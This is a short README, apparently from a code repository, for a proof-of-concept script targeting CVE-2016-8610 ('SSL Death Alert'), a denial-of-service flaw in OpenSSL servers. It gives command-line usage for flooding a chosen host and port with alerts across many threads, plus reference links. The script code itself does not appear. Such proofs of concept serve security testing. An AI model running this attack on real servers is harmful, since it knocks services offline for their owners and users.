Skip to content
Snippets Groups Projects
README.md 426 B
Newer Older
cujanovic's avatar
cujanovic committed
# CVE-2016-8610 PoC
cujanovic's avatar
cujanovic committed
CVE-2016-8610 (SSL Death Alert) PoC
cujanovic's avatar
cujanovic committed

Usage:

python ssl-death-alert.py DOMAIN/IP PORT PROTOCOL-VERSION(SSLv3, TLS1.0, TLS1.1, TLS1.2) NUMBER-OF-ALERTS(1000) THREADS(50)

cujanovic's avatar
cujanovic committed
python ssl-death-alert.py test.tdl 443 TLS1.2 1000 50

cujanovic's avatar
cujanovic committed
More info:

http://security.360.cn/cve/CVE-2016-8610/

https://securingtomorrow.mcafee.com/mcafee-labs/ssl-death-alert-cve-2016-8610-can-cause-denial-of-service-to-openssl-servers/